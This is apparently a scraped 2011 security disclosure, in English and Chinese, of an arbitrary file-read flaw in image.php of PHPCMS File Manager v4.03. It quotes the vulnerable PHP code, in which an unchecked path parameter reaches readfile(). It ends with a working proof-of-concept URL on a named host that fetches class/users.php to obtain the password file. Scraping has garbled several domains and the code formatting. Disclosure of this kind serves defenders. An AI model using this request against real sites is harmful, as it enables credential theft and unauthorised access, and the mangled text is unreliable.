# #Author : HeXie S3curity TeAm #Date : 2011.10.01 #
#FIle : /image.php <?php /* *######################################### * PHPCMS File Manager * Copyright (c) 2004-2006 phpcms.cn * Author: Longbill ( HdhCmsTestlongbill.cn ) * longbill.cn@gmail测试数据 HdhCmsTest2cto测试数据 *######################################### */
$path = $_GET["path"]; //读取路径信息 $from = $_SERVER[HTTP_REFERER]; $from = dirname($from).'/'; if ($from != '/' ) $path = str_replace($from,"",$path);
$max = $_GET["max"]; include_once("func.php"); $etag = "qqqq"; if ($_SERVER['HTTP_IF_NONE_MATCH'] == $etag) { header('Etag:'.$etag,true,304); exit; } else header('Etag:'.$etag); header('Last-Modified:Tue,01 Aug 1999 10:26:24 GMT');
if (!$path || !file_exists($path)) $path="images/notfound.gif"; //图片没有找到 if (!$max) err(); //{通过Get方法传递的Max变量, 当$Max不成立时将调用err 函数.} 我们来看看err 函数是怎么写的. view sourceprint?FiLe : /image.php
function err() { global $path; header("Content-Length: " .@filesize($path )); readfile($path); //读取$path. die; }
PoC: http://hkmjj测试数据/cms/image.php?path=class/users.php//读取密码文件, 前台登陆. 如果没有显示,请右键 源码 形式打开. end.
查看更多关于PHPCMS FileManager v4.03 FileRead Vulnerability -的详细内容...